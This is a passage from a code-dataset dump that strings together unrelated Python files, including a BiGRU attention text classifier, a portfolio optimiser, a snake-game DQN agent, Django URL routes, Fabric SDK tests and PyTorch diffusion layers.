Tokenizer(num_words=MAX_FEATURES)\ntokenizer.fit_on_texts(list(X_tra))\nX_tra = tokenizer.texts_to_sequences(X_tra)\nX_val = tokenizer.texts_to_sequences(X_val)\nX_te = tokenizer.texts_to_sequences(X_te)\n\n## Pad the sentences \nMAX_LEN = min(MAX_LEN, len(max(X_tra, key=len)))\nX_tra = pad_sequences(X_tra, maxlen=MAX_LEN)\nX_val = pad_sequences(X_val, maxlen=MAX_LEN)\nX_te = pad_sequences(X_te, maxlen=MAX_LEN)\n\n## Get the target values\nY_tra = train_df['target'].values\nY_val = val_df['target'].values\n# Load embeddings\nembedding_matrix = get_embeddings_matrix()\n# Define input tensor\ninp = Input(shape=(X_tra.shape[1],), dtype='int32')\n\n# Word embedding layer\nembedded_inputs = Embedding(embedding_matrix.shape[0], embedding_matrix.shape[1], \n weights=[embedding_matrix], trainable = False)(inp)\n\n# Apply dropout to prevent overfitting\nembedded_inputs = SpatialDropout1D(0.2)(embedded_inputs)\n\n# Apply Bidirectional GRU over embedded inputs\nrnn_outs = Bidirectional(\\\n CuDNNGRU(64, return_sequences=True))(embedded_inputs)\nrnn_outs = Dropout(0.2)(rnn_outs) # Apply dropout to GRU outputs to prevent overfitting\n\n# Attention Mechanism - Generate attention vectors\nsentence, word_scores = Attention(return_attention=True, name = \"attention_vec\")(rnn_outs)\n\n# Dense layers\nfc = Dense(64, activation='relu')(sentence)\nfc = Dropout(0.5)(fc)\noutput = Dense(1, activation='sigmoid')(fc)\n\n# Finally building model\nmodel = Model(inputs=inp, outputs=output)\nmodel.compile(loss='binary_crossentropy', metrics=[\"accuracy\"], optimizer='adam')\n\n# Print model summary\nmodel.summary()\n# Train model\nF1_Score = F1Evaluation(validation_data=(X_val, Y_val), interval=1)\nhist = model.fit(X_tra, Y_tra, validation_data=(X_val, Y_val), \n epochs=3, batch_size=512, callbacks=[F1_Score])\nval_loss = hist.history['val_loss'];val_acc = hist.history['val_acc']\nloss = hist.history['loss'];acc = hist.history['acc']\nmake_plot(loss, val_loss, acc, val_acc)\nval_pred = model.predict([X_val], batch_size=1024, verbose=1)\nf1s = []\nmax_thresh, max_f1 = 0, 0\nfor thresh in np.arange(0.1, 0.9, 0.01):\n f1s.append(metrics.f1_score(Y_val, (val_pred>thresh)))\nmax_f1 = 
np.max(f1s)\nmax_thresh = np.arange(0.1, 0.9, 0.01)[np.argmax(f1s)]\nprint('Validation set: Max F1-Score: %.2f - reached with threshold: %.2f' % (max_f1, max_thresh))\nfor _ in range(3):\n visualize_attention()\ntest_pred = model.predict([X_te], batch_size=1024, verbose=1)\ntest_pred_thresh = (test_pred>max_thresh).astype(int)\nout_df = pd.DataFrame({\"qid\":test_df[\"qid\"].values})\nout_df['prediction'] = test_pred_thresh\nout_df.to_csv(\"submission.csv\", index=False)\nout_df.head()","repo_name":"aorursy/new-nb-1","sub_path":"alber8295_bigru-w-attention-visualized-for-beginners.py","file_name":"alber8295_bigru-w-attention-visualized-for-beginners.py","file_ext":"py","file_size_in_byte":14308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"69969682811","text":"# alter it to work with any list of securities\n# discover more about quadratic programming\n# explain the optimisation process in more detail\n# map out routes for web app\n# add delete and add buttons for web app\n# look at rendering graphs on a web app\n\nimport pandas_datareader as web\nfrom datetime import datetime\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport psycopg2\nimport cvxopt as opt\nfrom cvxopt import blas, solvers\nimport numpy as np\nimport matplotlib.dates as mdates\nimport pygal\nimport plotly\nimport plotly.graph_objs as go\nimport plotly.plotly as py\nimport plotly.tools as tls\nimport json\nimport mpld3\n\n\nsolvers.options['show_progress'] = False\nreturns_table = pd.read_csv(\"returns_data.csv\", sep=',')\nnormedret_table = pd.read_csv(\"normed_ret.csv\", sep=',')\nprice_table = pd.read_csv(\"price_data.csv\", sep=',')\n\nstocks = ['MSFT','AAPL','AMZN']\n\ndef get_ticker():\n ticker = input(\"Please enter the ticker: \").upper()\n return ticker\n\ndef get_data(ticker):\n\n start = datetime(2016, 9, 1)\n end = datetime(2019, 2, 1)\n\n f = web.DataReader(ticker, 'iex', start, end)\n df = f[\"close\"]\n print(df.head())\n return df\n\ndef get_data_and_append():\n ticker = get_ticker()\n data = (get_data(ticker))\n dates['{}'.format(ticker)] = (get_data(ticker)).tolist()\n\nreturn_vec = (((returns_table[stocks]).values).T)\n\ndef rand_weights(n):\n ''' Produces n random weights that sum to 1 '''\n k = np.random.rand(n)\n return k / sum(k)\n\ndef random_portfolio(returns):\n '''\n Returns the mean and standard deviation of returns for a random portfolio\n '''\n\n p = np.asmatrix(np.mean(returns, axis=1))\n w = np.asmatrix(rand_weights(returns.shape[0]))\n C = np.asmatrix(np.cov(returns))\n\n mu = w * p.T\n sigma = np.sqrt(w * C * w.T)\n\n # This recursion reduces outliers to keep plots pretty\n if sigma > 2:\n return random_portfolio(returns)\n return mu, sigma\n\nn_portfolios = 2000\nmeans, stds = np.column_stack([\n random_portfolio(return_vec)\n for _ in range(n_portfolios)\n])\n\ndef optimal_portfolio(returns):\n n = len(returns)\n returns = np.asmatrix(returns)\n\n N = 100\n mus = [10**(5.0 * t/N - 1.0) for t in range(N)]\n\n # Convert to cvxopt matrices\n S = opt.matrix(np.cov(returns))\n pbar = opt.matrix(np.mean(returns, axis=1))\n\n # Create constraint matrices\n G = -opt.matrix(np.eye(n)) # negative n x n identity matrix\n h = opt.matrix(0.0, (n ,1))\n A = opt.matrix(1.0, (1, n))\n b = opt.matrix(1.0)\n\n # Calculate efficient frontier weights using quadratic programming\n portfolios = [solvers.qp(mu*S, -pbar, G, h, A, b)['x']\n for mu in mus]\n ## CALCULATE RISKS AND RETURNS FOR 
FRONTIER\n returns = [blas.dot(pbar, x) for x in portfolios]\n risks = [np.sqrt(blas.dot(x, S*x)) for x in portfolios]\n ## CALCULATE THE 2ND DEGREE POLYNOMIAL OF THE FRONTIER CURVE\n m1 = np.polyfit(returns, risks, 2)\n print(m1[2])\n print(m1[0])\n x1 = np.sqrt(m1[2] / m1[0])\n # CALCULATE THE OPTIMAL PORTFOLIO\n wt = solvers.qp(opt.matrix(x1 * S), -pbar, G, h, A, b)['x']\n return np.asarray(wt), returns, risks\n\n\ndef print_optimization(stocks):\n\n weights, returns, risks = optimal_portfolio((((returns_table[stocks]).values).T))\n\n print(weights)\n\n n_portfolios = 2000\n means, stds = np.column_stack([\n random_portfolio((((returns_table[stocks]).values).T))\n for _ in range(n_portfolios)\n ])\n\n plt.plot(stds, means, 'o', markersize=2)\n plt.ylabel('mean')\n plt.xlabel('std')\n plt.plot(risks, returns, 'y-o', markersize=2)\n plt.show()\n\ndef print_stock_returns(stocks):\n\n fig = go.Figure()\n for i in stocks:\n fig.add_scatter(x=returns_table['date'], y=returns_table[i], name=i, mode='lines')\n\n graphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n return graphJSON\n\n\ndef calculate_portfolio_returns(stocks):\n\n #Change this later for a selected portfolio\n weights, returns, risks = optimal_portfolio((((returns_table[stocks]).values).T))\n portfolio = stocks\n equal_weights = [1 / len(portfolio)] * len(portfolio)\n optimal_weights = weights.flatten()\n print(\"The equal weighting: {}\".format(equal_weights))\n print(\"The optimal weighting: {}\".format(optimal_weights))\n weighted_stock_return = (normedret_table[stocks].multiply(optimal_weights,axis=1))\n weighted_portfolio_return = weighted_stock_return.sum(axis=1)\n cum_portfolio_return = ((weighted_portfolio_return[1] + 1).cumprod()) - 1\n\n data = [\n go.Scatter(\n x=price_table['date'], # assign x as the dataframe column 'x'\n y=weighted_portfolio_return\n )\n ]\n\n graphJSON = json.dumps(data, cls=plotly.utils.PlotlyJSONEncoder)\n\n return graphJSON\n\ndef print_stock_prices(stocks):\n\n fig = go.Figure()\n for i in stocks:\n fig.add_scatter(x=price_table['date'], y=price_table[i], name=i, mode='lines')\n\n graphJSON = json.dumps(fig, cls=plotly.utils.PlotlyJSONEncoder)\n return graphJSON\n","repo_name":"Alastair-Revell/markowitz_portfolio_opt","sub_path":"get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":5089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40181134670","text":"import math\nimport random\nfrom collections import deque, namedtuple\nfrom itertools import count\n\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom IPython import display\n\nfrom snake_game import SnakeGame\nfrom snake_model import DQN\n\nplt.ion()\n\ndef plot(scores, mean_scores):\n display.clear_output(wait=True)\n #display.display(plt.gcf())\n plt.clf()\n plt.title('Training...')\n plt.xlabel('Number of Games')\n plt.ylabel('Score')\n plt.plot(scores)\n plt.plot(mean_scores)\n plt.ylim(ymin=0)\n plt.text(len(scores)-1, scores[-1], str(scores[-1]))\n plt.text(len(mean_scores)-1, mean_scores[-1], str(mean_scores[-1]))\n plt.show(block=False)\n plt.pause(.1)\n\n\n\n# if gpu is to be used\n\nTransition = namedtuple('Transition', ('state', 'action', 'next_state', 'reward', 'done'))\n\n\nclass ReplayMemory(object):\n\n def __init__(self, capacity):\n self.memory = deque([],maxlen=capacity)\n\n def push(self, *args):\n \"\"\"Save a transition\"\"\"\n self.memory.append(Transition(*args))\n\n def 
sample(self, batch_size):\n return random.sample(self.memory, batch_size)\n\n def __len__(self):\n return len(self.memory)\n\n\nclass SnakeAgent():\n def __init__(self, game, policy_net, target_net, optimizer, batch_size, replay_memory_size, target_update, device):\n # init game\n self.game = game\n self.device = device\n\n # init nets\n self.policy_net = policy_net\n self.target_net = target_net\n self.target_net.load_state_dict(self.policy_net.state_dict())\n self.target_net.eval()\n self.target_update = target_update\n\n # init optimizer and memory\n self.optimizer = optimizer\n self.replay_memory_size = replay_memory_size\n self.memory = ReplayMemory(replay_memory_size)\n \n # init training parameters\n self.batch_size = batch_size\n self.gamma = 0.9\n\n # exploration parameters\n self.eps_start = 0.9\n self.eps_end = 0\n self.eps_decay = 500\n self.steps_done = 0\n\n\n\n def get_state(self):\n\n grid_val = -10\n food_val = 1000\n snake_val = 1\n head_val = 10\n\n grid = grid_val*torch.ones(self.game.width, self.game.height)\n\n for i in range(1, len(self.game.snake)):\n grid[self.game.snake[i].x, self.game.snake[i].y] = snake_val\n\n if self.game.head.x == self.game.width:\n x_location = self.game.width - 1\n else:\n x_location = self.game.head.x\n\n if self.game.head.y == self.game.height:\n y_location = self.game.height - 1\n else:\n y_location = self.game.head.y\n\n grid[x_location, y_location] = head_val\n grid[self.game.food.x, self.game.food.y] = food_val\n\n return torch.unsqueeze(grid, 0)\n\n\n def select_action(self, state, mode='train'):\n sample = random.random()\n eps_threshold = self.eps_end + (self.eps_start - self.eps_end) * math.exp(-1. * self.steps_done / self.eps_decay)\n self.steps_done += 1\n\n # exploration\n if sample < eps_threshold and self.steps_done < self.replay_memory_size and mode == 'train':\n action = random.randint(0, 3)\n\n # exploitation\n else:\n state_0 = torch.unsqueeze(state, 0)\n prediction = self.policy_net(state_0.to(self.device))\n action = torch.argmax(prediction).item()\n\n return torch.tensor(action).view(1)\n\n\n def optimize_model(self):\n\n if len(self.memory) < self.batch_size:\n return\n\n transitions = self.memory.sample(self.batch_size)\n batch = Transition(*zip(*transitions))\n \n state_batch = torch.stack(batch.state).to(self.device)\n action_batch = torch.cat(batch.action).to(self.device)\n reward_batch = torch.cat(batch.reward).to(self.device)\n next_state_batch = torch.stack(batch.next_state).to(self.device)\n done_batch = torch.cat(batch.done).to(self.device)\n\n # Calculate Q values\n curr_Q = self.policy_net(state_batch).gather(1, action_batch.unsqueeze(1))\n next_Q = self.target_net(next_state_batch).max(1)[0].detach()\n expected_Q = reward_batch + (1 - done_batch) * (self.gamma * next_Q) \n\n # Compute loss\n criterion = nn.MSELoss()\n loss = criterion(curr_Q, expected_Q.unsqueeze(1))\n\n # Optimize the model\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n\n\ndef train():\n\n plot_scores = []\n plot_mean_scores = []\n total_score = 0\n total_score_batch = 0\n total_steps_per_game = 0\n record = 0\n\n n_actions = 4\n lr = 0.05\n num_total_games = 10000\n\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n game = SnakeGame(width=5, height=4, show_UI=0, gamespeed=1000)\n policy_net = DQN(game.width, game.height, n_actions).to(device)\n target_net = DQN(game.width, game.height, n_actions).to(device)\n optimizer = optim.Adam(policy_net.parameters(), lr=lr)\n scheduler = 
torch.optim.lr_scheduler.OneCycleLR(optimizer, lr, total_steps=num_total_games)\n agent = SnakeAgent(game, policy_net, target_net, optimizer, batch_size=64, replay_memory_size=10000, target_update=10, device=device)\n show_plot = False\n\n for num_games in range(num_total_games):\n # Initialize the environment and state\n game.restart()\n \n previous_state = agent.get_state()\n for t in count():\n # Get current state\n current_state = agent.get_state()\n state_memory = torch.cat([previous_state, current_state], 0) \n\n # Select and perform an action\n action = agent.select_action(state_memory)\n reward, done, score = game.play_step(action.item())\n reward = torch.tensor([reward], device=device)\n done = torch.tensor([done], device=device)\n\n # Observe new state\n next_state = agent.get_state()\n next_state_memory = torch.cat([current_state, next_state], 0) \n\n # update previous state\n previous_state = current_state\n\n # Store the transition in memory\n agent.memory.push(state_memory, action, next_state_memory, reward, done)\n\n # Perform one step of the optimization (on the policy network)\n agent.optimize_model()\n\n # if game is done\n if done:\n # adjust learning rate\n scheduler.step()\n\n # store record and save net\n if score > record: \n record = score\n\n # plot results \n if show_plot:\n total_score += score\n mean_score = total_score / num_games\n plot_scores.append(score)\n plot_mean_scores.append(mean_score)\n plot(plot_scores, plot_mean_scores)\n\n # log results\n total_steps_per_game += t\n total_score_batch += score\n if num_games % agent.batch_size == 0:\n mean_score = total_score_batch / agent.batch_size\n mean_steps_per_game = total_steps_per_game / agent.batch_size\n\n print(\n 'Game:', num_games, \n ' Record in batch:', record, \n ' mean score batch:', mean_score, \n ' mean steps per game:', mean_steps_per_game, \n ' Learning rate:', optimizer.param_groups[0]['lr']\n )\n \n record = 0\n total_score_batch = 0\n total_steps_per_game = 0\n agent.policy_net.save(file_name = 'snake_model_5x5_2.pth')\n \n break\n\n # Update the target network, copying all weights and biases in DQN\n if num_games % agent.target_update == 0:\n agent.target_net.load_state_dict(agent.policy_net.state_dict())\n\n\nif __name__ == '__main__':\n train()\n","repo_name":"Ibo-Git/neuralNetwork_shapes","sub_path":"snake_AI/snake_agent.py","file_name":"snake_agent.py","file_ext":"py","file_size_in_byte":8261,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"6469217954","text":"def fix_start(s):\r\n \r\n return \"\".join((s[0], s[1:].replace(s[0], '*')))\r\n\r\ndef test(got, expected):\r\n if got == expected:\r\n prefix = ' OK '\r\n else:\r\n prefix = ' X '\r\n print('%s got: %s expected: %s' % (prefix, repr(got), repr(expected)))\r\n\r\n\r\n# Provided main() calls the above functions with interesting inputs,\r\n# using test() to check if each result is correct or not.\r\ndef main():\r\n print('fix_start')\r\n test(fix_start('babble'), 'ba**le')\r\n test(fix_start('aardvark'), 'a*rdv*rk')\r\n test(fix_start('google'), 'goo*le')\r\n test(fix_start('donut'), 'donut')\r\n\r\n# Standard boilerplate to call the main() function.\r\nif __name__ == '__main__':\r\n main()","repo_name":"jose-zanetti/PythonTutorial","sub_path":"LessonOne/FixStart.py","file_name":"FixStart.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22242189101","text":"from 
django.urls import path\nfrom .views import (\n\t\t# find_projects_by_client,\n\t\t# find_projects_by_date,\n\t\t# find_projects_by_status,\n\t\t# find_projects_by_client_date_status,\n\t\tfind_project_detail_report,\n\t\tSearchProjectsByClient,\n\t\tSearchProjectsByDate,\n\t\tSearchProjectsByStatus,\n\t\tSearchProjectsByClientDateStatus\n\t)\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\n# project name\napp_name='search'\n\nurlpatterns = [\n # path('searchprojectsbyclient/', find_projects_by_client, name='searchprojectsbyclient'),\n path('searchprojectsbyclient/', SearchProjectsByClient.as_view(), name='searchprojectsbyclient'),\n path('searchprojectsbydate/', SearchProjectsByDate.as_view(), name='searchprojectsbydate'),\n # path('searchprojectsbydate/', find_projects_by_date, name='searchprojectsbydate'),\n # path('searchprojectsbystatus/', find_projects_by_status, name='searchprojectsbystatus'),\n path('searchprojectsbystatus/', SearchProjectsByStatus.as_view(), name='searchprojectsbystatus'),\n # path('searchprojectsbyclientdatestatus/', find_projects_by_client_date_status, name='searchprojectsbyclientdatestatus'),\n path('searchprojectsbyclientdatestatus/', SearchProjectsByClientDateStatus.as_view(), name='searchprojectsbyclientdatestatus'),\n path('searchprojectdetailedreport/', find_project_detail_report, name='searchprojectdetailedreport'),\n\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)","repo_name":"rohanneps/django","sub_path":"Django-Rest-Framework/rest_app/search/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5544239929","text":"import os\nimport unittest\nfrom hfc.fabric.client import Client\nfrom hfc.fabric.transaction.tx_context import TXContext\nfrom hfc.util.crypto.crypto import Ecies\nfrom hfc.util import utils\nfrom test.integration.utils import get_orderer_org_user\nfrom test.integration.config import E2E_CONFIG\nfrom hfc.protos.msp import identities_pb2\nfrom hfc.protos.common import configtx_pb2\nfrom hfc.protos.common import common_pb2\nfrom google.protobuf.timestamp_pb2 import Timestamp\n\n\nclass UtilsTest(unittest.TestCase):\n def setUp(self):\n self.orderer_org_mspid = \\\n E2E_CONFIG['test-network']['orderer']['mspid']\n self.channel_tx = \\\n E2E_CONFIG['test-network']['channel-artifacts']['channel.tx']\n self.channel_id = \\\n E2E_CONFIG['test-network']['channel-artifacts']['channel_id']\n self.base_path = \"/tmp/fabric-sdk-py\"\n self.kv_store_path = os.path.join(self.base_path, \"key-value-store\")\n\n def test_create_serialized_identity(self):\n client = Client('test/fixtures/network.json')\n\n orderer_org_admin = get_orderer_org_user(state_store=client.state_store\n )\n orderer_org_admin_serialized = utils.create_serialized_identity(\n orderer_org_admin)\n serialized_identity = identities_pb2.SerializedIdentity()\n serialized_identity.ParseFromString(orderer_org_admin_serialized)\n\n self.assertEqual(serialized_identity.mspid,\n self.orderer_org_mspid)\n\n def test_build_channel_header(self):\n timestamp = utils.current_timestamp()\n proto_channel_header = utils.build_channel_header(\n common_pb2.HeaderType.Value('CONFIG_UPDATE'),\n '12341234',\n self.channel_id,\n timestamp\n )\n\n self.assertIsInstance(proto_channel_header, common_pb2.ChannelHeader)\n self.assertEqual(proto_channel_header.channel_id, self.channel_id)\n\n def test_string_to_signature(self):\n with open(self.channel_tx, 'rb') 
as f:\n channel_tx = f.read()\n\n channel_config = utils.extract_channel_config(channel_tx)\n\n client = Client('test/fixtures/network.json')\n\n orderer_org_admin = get_orderer_org_user(state_store=client.state_store\n )\n orderer_org_admin_tx_context = \\\n TXContext(orderer_org_admin, Ecies(), {})\n client.tx_context = orderer_org_admin_tx_context\n\n orderer_org_admin_signature = client.sign_channel_config(\n channel_config\n )\n\n proto_signature = utils.string_to_signature(\n [orderer_org_admin_signature]\n )\n\n self.assertIsInstance(proto_signature, list)\n self.assertTrue(\n 'OrdererMSP' in proto_signature[0].signature_header.__str__())\n\n def test_current_timestamp(self):\n my_timestamp = Timestamp()\n my_timestamp.GetCurrentTime()\n\n their_timestamp = utils.current_timestamp()\n self.assertEqual(my_timestamp.seconds, their_timestamp.seconds)\n\n def test_extract_channel_config(self):\n with open(self.channel_tx, 'rb') as f:\n channel_tx = f.read()\n\n config_update = configtx_pb2.ConfigUpdate()\n\n channel_config = utils.extract_channel_config(channel_tx)\n self.assertTrue(hasattr(channel_config, 'decode'))\n\n config_update.ParseFromString(channel_config)\n self.assertEqual(config_update.channel_id, self.channel_id)\n\n def test_build_header(self):\n timestamp = utils.current_timestamp()\n\n client = Client('test/fixtures/network.json')\n\n orderer_org_admin = get_orderer_org_user(state_store=client.state_store\n )\n orderer_org_admin_tx_context = \\\n TXContext(orderer_org_admin, Ecies(), {})\n client.tx_context = orderer_org_admin_tx_context\n\n orderer_org_admin_serialized = utils.create_serialized_identity(\n orderer_org_admin)\n serialized_identity = identities_pb2.SerializedIdentity()\n serialized_identity.ParseFromString(orderer_org_admin_serialized)\n\n proto_channel_header = utils.build_channel_header(\n common_pb2.HeaderType.Value('CONFIG_UPDATE'),\n orderer_org_admin_tx_context.tx_id,\n self.channel_id,\n timestamp\n )\n\n channel_header = utils.build_header(\n orderer_org_admin_tx_context.identity,\n proto_channel_header,\n orderer_org_admin_tx_context.nonce\n )\n self.assertIsInstance(channel_header, common_pb2.Header)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"hyperledger/fabric-sdk-py","sub_path":"test/integration/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":4721,"program_lang":"python","lang":"en","doc_type":"code","stars":400,"dataset":"github-code","pt":"78"} +{"seq_id":"17124555428","text":"import sys\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom collections.abc import Iterable\nfrom itertools import repeat\n\nsys_version = tuple(sys.version_info)[:3]\nif sys_version < (3, 8, 0):\n from functools import reduce\n import operator as op\n\n\n def math_prod(x):\n return reduce(op.mul, x, 1)\n\nelse:\n math_prod = math.prod\n\n\nDEFAULT_DTYPE = torch.float32\n\n\ndef lecun_normal_(tensor: nn.Parameter, scale: float = 1.):\n \"\"\"\n Lecun normal (in-place) initializer\n a specialization of variance scaling initialization\n reference: https://jax.readthedocs.io/en/latest/_autosummary/jax.nn.initializers.lecun_normal.html#jax.nn.initializers.lecun_normal\n \"\"\"\n assert tensor.ndim >= 2\n nn.init.trunc_normal_(tensor, mean=0., std=1., a=-2., b=2.) 
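# per-weight draw is N(0, 1), rescaled below by sqrt(scale / fan_in); 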
# truncated at 2 std\n fan_in = tensor.shape[1] * (math_prod(tensor.shape[2:]) if tensor.ndim > 2 else 1)\n tensor.data.mul_(math.sqrt(scale / fan_in))\n return tensor\n\n\nDEFAULT_INITIALIZER = lecun_normal_\n\n\ndef ntuple(n, name=\"parse\"):\n def parse(x):\n if isinstance(x, Iterable):\n return tuple(x)\n else:\n return tuple(repeat(x, n))\n\n parse.__name__ = name\n return parse\n\n\npair = ntuple(2, \"pair\")\n\n\nclass Linear(nn.Module):\n def __init__(\n self,\n in_features,\n out_features,\n bias=True,\n init_scale=1.\n ):\n super(Linear, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.weight = nn.Parameter(torch.empty((out_features, in_features), dtype=DEFAULT_DTYPE))\n if bias:\n self.bias = nn.Parameter(torch.empty((out_features,), dtype=DEFAULT_DTYPE))\n else:\n self.register_parameter('bias', None)\n self.init_scale = init_scale\n self.reset_parameters()\n\n def reset_parameters(self):\n DEFAULT_INITIALIZER(self.weight, scale=self.init_scale)\n if self.bias is not None:\n nn.init.zeros_(self.bias)\n\n def forward(self, input):\n return F.linear(input, self.weight, self.bias)\n\n def extra_repr(self):\n return 'in_features={}, out_features={}, bias={}'.format(\n self.in_features, self.out_features, self.bias is not None)\n\n\nclass Conv2d(nn.Module):\n def __init__(\n self,\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n padding=0,\n dilation=1,\n groups=1,\n bias=True,\n padding_mode=\"zeros\",\n init_scale=1.\n ):\n super(Conv2d, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.kernel_size = kernel_size = pair(kernel_size)\n self.weight = nn.Parameter(\n torch.empty((\n out_channels, in_channels // groups, kernel_size[0], kernel_size[1]\n ), dtype=DEFAULT_DTYPE))\n if bias:\n self.bias = nn.Parameter(torch.empty((out_channels,), dtype=DEFAULT_DTYPE))\n else:\n self.register_parameter(\"bias\", None)\n self.stride = pair(stride)\n self.padding = padding if isinstance(padding, str) else pair(padding)\n self.dilation = pair(dilation)\n self.groups = groups\n self.padding_mode = padding_mode\n self.init_scale = init_scale\n self.reset_parameter()\n\n def reset_parameter(self):\n DEFAULT_INITIALIZER(self.weight, scale=self.init_scale)\n if self.bias is not None:\n nn.init.zeros_(self.bias)\n\n def extra_repr(self):\n s = ('{in_channels}, {out_channels}, kernel_size={kernel_size}'\n ', stride={stride}')\n if self.padding != (0,) * len(self.padding):\n s += ', padding={padding}'\n if self.dilation != (1,) * len(self.dilation):\n s += ', dilation={dilation}'\n if self.groups != 1:\n s += ', groups={groups}'\n if self.bias is None:\n s += ', bias=False'\n if self.padding_mode != 'zeros':\n s += ', padding_mode={padding_mode}'\n return s.format(**self.__dict__)\n\n def forward(self, x):\n return F.conv2d(\n x, self.weight, self.bias, stride=self.stride, padding=self.padding,\n dilation=self.dilation, groups=self.groups)\n\n\nclass ValidPad2d(nn.Module):\n def __init__(self, kernel_size, stride, mode=\"constant\", value=0.0):\n super(ValidPad2d, self).__init__()\n self.kernel_size = pair(kernel_size)\n self.stride = pair(stride)\n self.mode = mode\n self.value = value\n\n def forward(self, x):\n _, _, h, w = x.shape\n (k1, k2), (s1, s2) = self.kernel_size, self.stride\n h_pad, w_pad = s1 * math.ceil((h - k1 + 1) / s1 - 1) + k1 - h, \\\n s2 * math.ceil((w - k2 + 1) / s2 - 1) + k2 - w\n top_pad, bottom_pad = (math.floor(h_pad / 2), math.ceil(h_pad / 2)) if h_pad else (0, 0)\n left_pad, 
right_pad = (math.floor(w_pad / 2), math.ceil(w_pad / 2)) if w_pad else (0, 0)\n x = F.pad(x, pad=(left_pad, right_pad, top_pad, bottom_pad), mode=self.mode, value=self.value)\n return x\n\n\nclass SamePad2d(nn.Module):\n def __init__(self, kernel_size, stride, mode=\"constant\", value=0.0):\n super(SamePad2d, self).__init__()\n self.kernel_size = pair(kernel_size)\n self.stride = pair(stride)\n self.mode = mode\n self.value = value\n\n def forward(self, x):\n _, _, h, w = x.shape\n (k1, k2), (s1, s2) = self.kernel_size, self.stride\n h_pad, w_pad = s1 * math.ceil(h / s1 - 1) + k1 - h, s2 * math.ceil(w / s2 - 1) + k2 - w\n top_pad, bottom_pad = (math.floor(h_pad / 2), math.ceil(h_pad / 2)) if h_pad else (0, 0)\n left_pad, right_pad = (math.floor(w_pad / 2), math.ceil(w_pad / 2)) if w_pad else (0, 0)\n x = F.pad(x, pad=(left_pad, right_pad, top_pad, bottom_pad), mode=self.mode, value=self.value)\n return x\n\n\nclass OneHot(nn.Module):\n def __init__(self, num_classes=-1, exclude_zero=False):\n super().__init__()\n self.num_classes = num_classes\n self.exclude_zero = exclude_zero\n\n def forward(self, x):\n if x.dtype != torch.long:\n x = x.long()\n if self.exclude_zero:\n out = F.one_hot(\n x.sub(1).clamp(min=0), # non-negative\n num_classes=self.num_classes)\n out[x == 0] = 0\n else:\n out = F.one_hot(x, num_classes=self.num_classes)\n\n return out.float()\n\n\nclass Sequential(nn.Sequential):\n def forward(self, input, **kwargs):\n for module in self:\n input = module(input, **kwargs)\n return input\n","repo_name":"tqch/v-diffusion-torch","sub_path":"v_diffusion/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":6777,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"78"} +{"seq_id":"9517762667","text":"# coding: utf-8\n\n\"\"\"\n OmniCore Model and State Management API\n\n This is an OmniCore Model and State Management server. # noqa: E501\n\n The version of the OpenAPI document: 1.8.1\n Contact: omnicoresupport@korewireless.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nfrom __future__ import annotations\nfrom inspect import getfullargspec\nimport pprint\nimport re # noqa: F401\nimport json\n\n\nfrom typing import Optional\nfrom pydantic import BaseModel, Field, StrictStr, validator\nfrom OmniCore.models.x509_certificate_details import X509CertificateDetails\n\nclass PublicKeyCertificate(BaseModel):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n certificate: Optional[StrictStr] = Field(None, description=\"Certificate: The certificate data.\")\n format: Optional[StrictStr] = Field(None, description=\"Format: The certificate format. Possible values: \\\"UNSPECIFIED_PUBLIC_KEY_CERTIFICATE_FORMAT\\\" - The format has not been specified. This is an invalid default value and must not be used. 
\\\"X509_CERTIFICATE_PEM\\\" - An X.509v3 certificate ([RFC5280](https://www.ietf.org/rfc/rfc5280.txt)), encoded in base64, and wrapped by `-----BEGIN CERTIFICATE-----` and `-----END CERTIFICATE-----`.\")\n x509_details: Optional[X509CertificateDetails] = Field(None, alias=\"x509Details\")\n __properties = [\"certificate\", \"format\", \"x509Details\"]\n\n @validator('format')\n def format_validate_enum(cls, v):\n if v is None:\n return v\n\n if v not in ('X509_CERTIFICATE_PEM'):\n raise ValueError(\"must validate the enum values ('X509_CERTIFICATE_PEM')\")\n return v\n\n class Config:\n allow_population_by_field_name = True\n validate_assignment = True\n\n def to_str(self) -> str:\n \"\"\"Returns the string representation of the model using alias\"\"\"\n return pprint.pformat(self.dict(by_alias=True))\n\n def to_json(self) -> str:\n \"\"\"Returns the JSON representation of the model using alias\"\"\"\n return json.dumps(self.to_dict())\n\n @classmethod\n def from_json(cls, json_str: str) -> PublicKeyCertificate:\n \"\"\"Create an instance of PublicKeyCertificate from a JSON string\"\"\"\n return cls.from_dict(json.loads(json_str))\n\n def to_dict(self):\n \"\"\"Returns the dictionary representation of the model using alias\"\"\"\n _dict = self.dict(by_alias=True,\n exclude={\n },\n exclude_none=True)\n # override the default output from pydantic by calling `to_dict()` of x509_details\n if self.x509_details:\n _dict['x509Details'] = 